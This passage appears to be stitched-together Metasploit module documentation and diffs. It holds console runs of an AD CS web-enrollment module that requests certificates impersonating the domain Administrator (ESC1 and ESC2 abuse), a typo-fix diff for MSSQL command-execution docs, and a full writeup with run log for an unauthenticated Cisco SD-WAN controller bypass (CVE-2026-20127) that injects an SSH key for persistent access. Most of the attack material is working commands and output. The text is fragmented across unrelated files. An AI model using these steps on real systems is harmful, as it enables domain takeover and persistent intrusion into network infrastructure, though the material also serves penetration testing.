View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Retrieving available template list, this may take a few minutes
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for EXAMPLE\\Administrator on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
[+] Certificate generated using template User and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template User saved to /home/tmoose/.msf4/loot/20260116142051_default_10.5.132.180_windows.ad.cs_263748.pfx
[+] Certificate generated using template EFS and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template EFS saved to /home/tmoose/.msf4/loot/20260116142053_default_10.5.132.180_windows.ad.cs_150446.pfx
[+] Certificate generated using template Administrator and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template Administrator saved to /home/tmoose/.msf4/loot/20260116142055_default_10.5.132.180_windows.ad.cs_586273.pfx
[+] Certificate generated using template EFSRecovery and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116142057_default_10.5.132.180_windows.ad.cs_077399.pfx
[+] Certificate generated using template ESC16_1 and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116142101_default_10.5.132.180_windows.ad.cs_832421.pfx
[+] Certificate generated using template ESC2-Template and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116142102_default_10.5.132.180_windows.ad.cs_548200.pfx
[+] Certificate generated using template WebServer and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template WebServer saved to /home/tmoose/.msf4/loot/20260116142103_default_10.5.132.180_windows.ad.cs_191863.pfx
[+] Certificate generated using template SubCA and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template SubCA saved to /home/tmoose/.msf4/loot/20260116142105_default_10.5.132.180_windows.ad.cs_300086.pfx
[+] Certificate generated using template ESC1-Template and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116142106_default_10.5.132.180_windows.ad.cs_017489.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
#### Kerberos MODE:ALL
```msf
msf auxiliary(admin/http/web_enrollment_cert) > show options
Module options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
HttpPassword v3Mpassword no The HTTP password to specify for authentication
HttpUsername Administrator no The HTTP username to specify for authentication
MODE ALL yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
h, sapni, socks4, http, socks5
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE no The template to issue if MODE is SPECIFIC_TEMPLATE.
View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > show advanced
Module advanced options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN example.com yes The domain to use for Windows authentication (Must be FQDN
if HTTP:Auth is Kerberos)
DigestAlgorithm SHA256 yes The digest algorithm to use (Accepted: SHA1, SHA256)
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to
false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HTTP::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm,
kerberos, plaintext, none)
HttpClientTimeout no HTTP connection and receive timeout
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing
headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to d
isable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
SSLKeyLogFile no The SSL key log file
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and S
SL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3
, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/5.0 (Macintosh; Intel Mac no The User-Agent header to use for all requests
OS X 10_15_7) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/131.0
.0.0 Safari/537.36
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
When HTTP::Auth is kerberos:
Name Current Setting Required Description
---- --------------- -------- -----------
DomainControllerRhost 10.5.132.180 no The resolvable rhost for the Domain Controller
HTTP::Krb5Ccname no The ccache file to use for kerberos authentication
HTTP::KrbOfferedEncryptionType AES256,AES128,RC4-HMAC,DES-CBC yes Kerberos encryption types to offer
s -MD5,DES3-CBC-SHA1
HTTP::Rhostname WIN-DRC9HCDIMAT no The rhostname which is required for kerberos - the SPN
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, re
ad-only, write-only, read-write)
View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Retrieving available template list, this may take a few minutes
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_557407.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_545138.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_606180.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_023162.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template User and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_548243.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_843349.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116143538_default_10.5.132.180_windows.ad.cs_760252.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_236912.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_237890.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template EFS and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_360144.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_009299.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template EFS saved to /home/tmoose/.msf4/loot/20260116143544_default_10.5.132.180_windows.ad.cs_150360.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143546_default_10.5.132.180_mit.kerberos.cca_444407.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143547_default_10.5.132.180_mit.kerberos.cca_460069.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template Administrator and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143548_default_10.5.132.180_mit.kerberos.cca_941754.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_mit.kerberos.cca_484741.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template Administrator saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_windows.ad.cs_088506.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_665940.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_324874.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template EFSRecovery and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_559229.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_295382.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_windows.ad.cs_477946.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143556_default_10.5.132.180_mit.kerberos.cca_645978.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143557_default_10.5.132.180_mit.kerberos.cca_838211.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC16_1 and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143558_default_10.5.132.180_mit.kerberos.cca_485891.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_mit.kerberos.cca_709913.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_windows.ad.cs_818976.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_952232.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_169000.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC2-Template and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_042983.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_512322.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116143604_default_10.5.132.180_windows.ad.cs_206522.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_893032.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_156631.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template WebServer and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143608_default_10.5.132.180_mit.kerberos.cca_982799.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_mit.kerberos.cca_247412.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template WebServer saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_windows.ad.cs_955795.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143612_default_10.5.132.180_mit.kerberos.cca_119902.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143613_default_10.5.132.180_mit.kerberos.cca_847610.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template SubCA and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143614_default_10.5.132.180_mit.kerberos.cca_417480.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_mit.kerberos.cca_766015.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template SubCA saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_windows.ad.cs_888697.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_866496.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_528295.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC1-Template and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_103101.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_871753.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116143620_default_10.5.132.180_windows.ad.cs_135453.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
# Kerberos, ESC1
```msf
msf auxiliary(admin/http/web_enrollment_cert) > set MODE QUERY_ONLY
MODE => QUERY_ONLY
msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Retrieving available template list, this may take a few minutes
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144412_default_10.5.132.180_mit.kerberos.cca_605997.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144413_default_10.5.132.180_mit.kerberos.cca_011223.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) > set httpusername msfuser
httpusername => msfuser
msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
httppassword => v3Mpassword
msf auxiliary(admin/http/web_enrollment_cert) > set mode SPECIFIC_TEMPLATE
mode => SPECIFIC_TEMPLATE
msf auxiliary(admin/http/web_enrollment_cert) > set cert_template ESC1-Template
cert_template => ESC1-Template
msf auxiliary(admin/http/web_enrollment_cert) > set ALT_UPN Administrator@example.com
ALT_UPN => Administrator@example.com
msf auxiliary(admin/http/web_enrollment_cert) > run
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_142147.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_645508.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC1-Template and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_079562.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_912221.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116144918_default_10.5.132.180_windows.ad.cs_076676.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
# Kerberos, ESC2
```msf
msf auxiliary(admin/http/web_enrollment_cert) > show options
Module options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN Administrator@example.com no Alternative certificate UPN (format: USER@DOMAIN)
HttpPassword v3Mpassword no The HTTP password to specify for authentication
HttpUsername msfuser no The HTTP username to specify for authentication
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxi
es: socks5h, sapni, socks4, http, socks5
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
ics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE ESC1-Template no The template to issue if MODE is SPECIFIC_TEMPLATE.
View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > set CERT_TEMPLATE User
CERT_TEMPLATE => User
msf auxiliary(admin/http/web_enrollment_cert) > unset ALT_UPN
Unsetting ALT_UPN...
msf auxiliary(admin/http/web_enrollment_cert) > run
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_798433.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_355039.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template User and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_649135.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_950645.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) > set PFX /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
PFX => /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
msf auxiliary(admin/http/web_enrollment_cert) > set ON_BEHALF_OF EXAMPLE\\Administrator
ON_BEHALF_OF => EXAMPLE\Administrator
msf auxiliary(admin/http/web_enrollment_cert) > set cert_template User
cert_template => User
msf auxiliary(admin/http/web_enrollment_cert) > run
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_970115.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_854009.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template User and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_332600.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_241072.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_windows.ad.cs_115992.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
@@ -21,7 +21,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
## Verification Steps
1. Do: `use use admin/mssql/mssql_exec`
1. Do: `use admin/mssql/mssql_exec`
2. Do: `set USERNAME [username1]`
3. Do: `set PASSWORD [password1]`
3. Do: `set TECHNIQUE sp_oacreate` (optional, defaults to xp_cmdshell)
@@ -32,7 +32,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
## Scenarios
```
msf > use use use admin/mssql/mssql_exec
msf > use admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set USERNAME username1
USERNAME => username1
msf auxiliary(mssql_exec) > set PASSWORD password1
@@ -0,0 +1,207 @@
## Vulnerable Application
This module exploits CVE-2026-20127, an authentication bypass vulnerability in the Cisco Catalyst SD-WAN Controller
(vSmart). The vulnerability exists in the vdaemon DTLS control-plane service running on UDP port 12346.
The vdaemon service fails to properly validate the `verify_status` byte in `CHALLENGE_ACK_ACK` (msg_type=10) messages.
The `vbond_proc_challenge_ack_ack()` handler reads an attacker-controlled `verify_status` byte from the message body and,
if non-zero, sets the peer's authenticated flag to 1. Furthermore, the authentication gate in `vbond_proc_msg()` exempts
msg_type=10 from authentication checks, allowing an unauthenticated peer to send this message.
An attacker can:
1. Connect via DTLS 1.2 using a self-signed certificate (the server performs no certificate validation at the handshake stage)
2. Skip the `CHALLENGE_ACK` step entirely
3. Send a forged `CHALLENGE_ACK_ACK` message with `verify_status=1` to become a trusted peer without any legitimate credentials
Once authenticated, the module leverages a `VMANAGE_TO_PEER` message to inject an SSH public key into the
`/home/vmanage-admin/.ssh/authorized_keys` file, providing persistent SSH access to the controller's NETCONF service
on port 830.
### Affected Versions
The vulnerability affects Cisco Catalyst SD-WAN Controller (vSmart) versions prior to the patches released in February 2026.
Consult [Cisco's security advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk)
for a complete list of affected versions and patches.
## Verification Steps
1. Start `msfconsole`
2. `use auxiliary/admin/networking/cisco_sdwan_auth_bypass`
3. `set RHOST <target_ip>`
4. Optionally, `set DOMAIN_ID <domain_id>` and `set SITE_ID <site_id>` if you know the target's SD-WAN topology
5. `check` to verify the target is vulnerable
6. `run` to exploit the vulnerability and inject an SSH public key
7. Use the generated SSH private key to connect to the NETCONF service: `ssh -i <key_path> vmanage-admin@<target_ip> -p 830`
## Options
### DOMAIN_ID
The SD-WAN domain ID to use in protocol messages. Default: `1`.
This value must match the domain ID configured on the target controller. In most deployments, the default value of 1
is used. If you receive a `TEAR_DOWN` message after sending `Hello`, try adjusting this value.
### SITE_ID
The SD-WAN site ID to use in protocol messages. Default: `100`.
This value identifies the site in the SD-WAN topology. The default value should work in most cases, but if the exploit
fails, you may need to adjust this based on knowledge of the target's SD-WAN configuration.
### SSH_PUBLIC_KEY_FILE
Path to an existing SSH public key file (in OpenSSH format) to inject into the controller.
If not set, the module will automatically generate a new RSA 2048-bit SSH keypair. Using an existing key can be useful
if you want to maintain access using a key you already control.
## Scenarios
### Cisco Catalyst SD-WAN Controller 20.15.3 (Default Configuration)
In this scenario, we target a vSmart controller with default settings. The module automatically generates an SSH keypair
and injects the public key.
```
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > show options
Module options (auxiliary/admin/networking/cisco_sdwan_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN_ID 1 yes SD-WAN domain ID
RHOSTS 192.168.86.166 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 12346 yes The target port (UDP)
SITE_ID 100 yes SD-WAN site ID
SSH_PUBLIC_KEY_FILE no Path to an existing SSH public key file to inject
View the full module info with the info, or info -d command.
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > check
[+] 192.168.86.166:12346 - The target is vulnerable. Authentication bypass succeeded - server accepted forged CHALLENGE_ACK_ACK
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > run
[*] Running module against 192.168.86.166
[*] Phase 1: DTLS handshake with self-signed certificate
[*] DTLS handshake succeeded (self-signed cert accepted)
[*] Phase 2: Waiting for CHALLENGE from server
[*] CHALLENGE received (580 bytes of challenge data)
[*] Phase 3: Sending CHALLENGE_ACK_ACK with verify_status=1
[*] Server Hello received
[*] Phase 4: Sending Hello as authenticated peer
[*] Hello response received - we are now a trusted peer
[*] Phase 5: SSH key injection into vmanage-admin authorized_keys
[*] Generating RSA 2048-bit SSH keypair
[*] SSH private key saved to loot: /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
[+] Connect to NETCONF via:
chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
[*] Server responded with: REGISTER_TO_VMANAGE (key has been injected)
[+] Authentication bypass and SSH key injection completed!
[*] Auxiliary module execution completed
